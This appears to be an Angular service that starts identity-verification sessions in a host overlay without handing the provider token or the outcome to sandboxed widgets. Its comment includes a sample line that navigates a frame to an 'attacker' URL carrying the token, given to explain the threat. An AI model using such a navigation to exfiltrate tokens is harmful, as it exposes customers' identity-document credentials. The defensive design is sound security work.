import { Injectable, NgZone, ViewContainerRef, inject } from '@angular/core';
import { KycLevel } from '@finxone-platform/shared/sys-config-types';
import { BrnDialogService } from '@spartan-ng/brain/dialog';
import { firstValueFrom } from 'rxjs';
import {
  IdentityVerificationComponent,
  IdentityVerificationContext,
} from '../../../Modules/shared/identity-verification/identity-verification.component';
import { ConfigService } from '../config-service/config-service.service';
import { MetadataService } from '../metadata-service/metadata-service.service';
import { ViewContainerRefService } from '../view-container-ref/view-container-ref.service';

/**
 * Host-side identity verification, for callers that must *start* a KYC/KYB
 * session without ever *holding* the provider credential — specifically the
 * custom-widget bridge.
 *
 * ## Why launch() returns no token and no outcome
 *
 * The provider access token from `POST /verification-provider/get-token` is a
 * credential for the customer's identity documents. A custom widget runs in a
 * sandboxed iframe, and a sandboxed frame can always navigate itself
 * (`location.href = 'https://attacker/?token=…'`) — no CSP directive prevents
 * that — so any token reaching a widget bundle is exfiltratable by that bundle or
 * by anything it loaded. The same reasoning as CardSecretRevealService.
 *
 * The vendor SDK also cannot run inside the sandbox at all: it wants camera
 * access, its own cross-origin frames and network access to the provider.
 *
 * So the whole session runs in host-controlled DOM: this service fetches the
 * token and opens IdentityVerificationComponent, which launches the vendor there.
 * The caller is told `{ launched: true }` and nothing else.
 *
 * ## And no outcome, either
 *
 * `launch()` resolves as soon as the session has started — it deliberately does
 * **not** await the overlay closing. Closing means the documents were submitted,
 * not that verification passed: the decision is made asynchronously and arrives
 * as a provider webhook into the *backend*. The frontend has no socket for it, so
 * the outcome reaches a widget through the polled `onboardingStatus` topic.
 * Awaiting the overlay would therefore only produce a promise that resolves at a
 * moment meaning nothing.
 *
 * Bridge integrators: map any failure to a generic host error. Provider failures
 * name provider internals, and none of that is a widget's business.
 */
@Injectable({ providedIn: 'root' })
export class IdentityVerificationService {
  private readonly dialogService = inject(BrnDialogService);
  private readonly rootViewContainerRef = inject(ViewContainerRefService);
  private readonly metadataService = inject(MetadataService);
  private readonly configService = inject(ConfigService);
  private readonly zone = inject(NgZone);

  /**
   * Mints a provider session and launches it in a host overlay.
   *
   * @returns `{ launched: true }` once the vendor session has been started.
   * Never the token, never the session, never the outcome.
   * @throws Error when no provider session could be minted (message never
   * contains the token).
   */
  public async launch(level: KycLevel): Promise<{ launched: boolean }> {
    const session = await firstValueFrom(this.metadataService.getKycAccessToken(level));
    if (!session?.token) {
      throw new Error(`identity-verification: no provider session available for level '${level}'`);
    }

    const context: IdentityVerificationContext = {
      accessToken: session.token,
      level,
      // Prefills the provider session was minted with; the vendor uses them for
      // its own contact steps. They come from the platform, not from the widget.
      email: session.email,
      phone: session.phoneNumber,
      themeVariables: this.configService.rawGlobalCssVariables(),
    };

    return this.zone.run(() => {
      let vcr: ViewContainerRef | undefined;
      try {
        vcr = this.rootViewContainerRef.get();
      } catch {
        vcr = undefined;
      }
      this.dialogService.open(IdentityVerificationComponent, vcr, context, {
        role: 'dialog',
        // The vendor owns multi-step flows with camera prompts; an accidental
        // backdrop click part-way through would lose the applicant's progress.
        disableClose: true,
        closeOnBackdropClick: false,
        closeOnOutsidePointerEvents: false,
      });
      // Resolves on launch, not on close — see the class docs.
      return { launched: true };
    });
  }
}
